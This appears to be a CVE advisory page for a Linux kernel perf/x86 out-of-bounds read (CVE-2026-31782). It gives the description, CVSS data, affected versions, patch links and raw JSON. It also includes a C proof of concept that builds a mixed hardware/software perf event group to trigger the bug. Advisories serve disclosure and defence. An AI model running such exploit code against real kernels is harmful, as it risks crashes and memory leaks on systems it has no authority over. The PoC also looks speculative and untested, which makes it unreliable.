Security Vulnerability Report
CVE-2026-31782 CVSS 7.8 HIGH

CVE-2026-31782

Published: 2026-05-01 15:16:42
Last Modified: 2026-05-11 20:48:05
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

perf/x86: Fix potential bad container_of in intel_pmu_hw_config

Auto counter reload may have a group of events with software events present within it. The software event PMU isn't the x86_hybrid_pmu and a container_of operation in intel_pmu_set_acr_caused_constr (via the hybrid helper) could cause out of bound memory reads. Avoid this by guarding the call to intel_pmu_set_acr_caused_constr with an is_x86_event check.
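The guard pattern described above, as an added userspace model (not kernel code and not part of the original report): a container lookup is only valid for a `pmu` that really is embedded in the containing struct, so the group walk checks membership first. All type, field and function names here (`hybrid_pmu`, `acr_cntr_mask`, `is_hybrid_member`, `group_acr_mask`) are simplified assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Userspace model: all types and names are simplified assumptions, not kernel code. */
struct pmu { const char *name; };
struct hybrid_pmu { uint64_t acr_cntr_mask; struct pmu pmu; }; /* embeds a pmu */
struct event { struct pmu *pmu; };
static struct hybrid_pmu hybrid_pmus[2] = { { 0x0f, { "cpu_core" } }, { 0x03, { "cpu_atom" } } };
static struct pmu software_pmu = { "software" }; /* stand-alone, no container */

/* Address container_of() would yield, as an integer so nothing bad is dereferenced. */
static uintptr_t container_addr(const struct pmu *p)
{
    return (uintptr_t)p - offsetof(struct hybrid_pmu, pmu);
}

/* Guard in the spirit of is_x86_event: true only for PMUs embedded in a hybrid_pmu. */
static bool is_hybrid_member(const struct pmu *p)
{
    for (size_t i = 0; i < 2; i++)
        if (p == &hybrid_pmus[i].pmu)
            return true;
    return false;
}

/* OR the masks of the group's x86 events; returns how many events the guard skipped. */
static int group_acr_mask(struct event *const *group, size_t n, uint64_t *mask)
{
    int skipped = 0;
    *mask = 0;
    for (size_t i = 0; i < n; i++) {
        const struct pmu *p = group[i]->pmu;
        if (!is_hybrid_member(p)) { skipped++; continue; }
        *mask |= ((const struct hybrid_pmu *)container_addr(p))->acr_cntr_mask;
    }
    return skipped;
}

int main(void)
{
    struct event hw = { &hybrid_pmus[0].pmu }, sw = { &software_pmu };
    struct event *group[] = { &hw, &sw };
    uint64_t mask;
    int skipped = group_acr_mask(group, 2, &mask);
    printf("mask=%#llx skipped=%d\n", (unsigned long long)mask, skipped);
    return 0;
}
```

For `software_pmu`, `container_addr()` returns an address in front of the object itself, which is the out-of-bounds location an unguarded lookup would read from.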

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.16.1 up to, but excluding, 6.18.22) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19 up to, but excluding, 6.19.12) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.16:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
Linux kernel (before the specific fix commit)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <linux/perf_event.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>   /* declares ioctl(), used below */
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <errno.h>

// PoC for CVE-2026-31782: Linux Kernel perf/x86 Out-of-Bounds Read
// This PoC attempts to trigger the vulnerability by creating a perf event group
// containing both hardware and software events on a hybrid x86 system.
// The goal is to hit the `intel_pmu_hw_config` path where `container_of` is used
// on a software PMU event, leading to an out-of-bounds read.

// glibc provides no wrapper for perf_event_open, so call it via syscall().
static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
                            int cpu, int group_fd, unsigned long flags)
{
    return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}

int main()
{
    struct perf_event_attr pe;
    int fd_hw, fd_sw;

    memset(&pe, 0, sizeof(pe));

    // Configure a hardware event (e.g., instructions)
    pe.type = PERF_TYPE_HARDWARE;
    pe.size = sizeof(pe);
    pe.config = PERF_COUNT_HW_INSTRUCTIONS;
    pe.disabled = 1;
    pe.exclude_kernel = 0;
    pe.exclude_hv = 0;

    fd_hw = perf_event_open(&pe, 0, -1, -1, 0);
    if (fd_hw == -1) {
        perror("Error opening leader HW event");
        return -1;
    }

    // Configure a software event (e.g., context switches) to be added to the group
    // Adding a software event to a hardware group may trigger the hybrid PMU logic bug
    // if auto counter reload is active.
    memset(&pe, 0, sizeof(pe));
    pe.type = PERF_TYPE_SOFTWARE;
    pe.size = sizeof(pe);
    pe.config = PERF_COUNT_SW_CONTEXT_SWITCHES;

    // Attempt to add to the group created by fd_hw
    fd_sw = perf_event_open(&pe, 0, -1, fd_hw, 0);
    if (fd_sw == -1) {
        perror("Error opening SW event in group");
        close(fd_hw);
        return -1;
    }

    printf("PoC executed successfully. Check kernel logs for OOPS or crashes.\n");

    // Enable the group
    ioctl(fd_hw, PERF_EVENT_IOC_ENABLE, 0);

    close(fd_hw);
    close(fd_sw);
    return 0;
}

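References

https://git.kernel.org/stable/c/bfee04838f636d064bc92075c65c95f739003804 (Patch)
https://git.kernel.org/stable/c/dbde07f06226438cd2cf1179745fa1bec5d8914a (Patch)
https://git.kernel.org/stable/c/e435a30ca6fe14c9611b1fc731c98a6d28410247 (Patch)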

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31782", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:41.707", "lastModified": "2026-05-11T20:48:04.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86: Fix potential bad container_of in intel_pmu_hw_config\n\nAuto counter reload may have a group of events with software events\npresent within it. The software event PMU isn't the x86_hybrid_pmu and\na container_of operation in intel_pmu_set_acr_caused_constr (via the\nhybrid helper) could cause out of bound memory reads. Avoid this by\nguarding the call to intel_pmu_set_acr_caused_constr with an\nis_x86_event check."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16.1", "versionEndExcluding": "6.18.22", "matchCriteriaId": "A373E4BD-44BD-4FB8-8A1D-03D3759ABECA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.16:-:*:*:*:*:*:*", "matchCriteriaId": 
"6238B17D-C12B-458F-A138-97039BFC4595"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/bfee04838f636d064bc92075c65c95f739003804", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/dbde07f06226438cd2cf1179745fa1bec5d8914a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e435a30ca6fe14c9611b1fc731c98a6d28410247", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}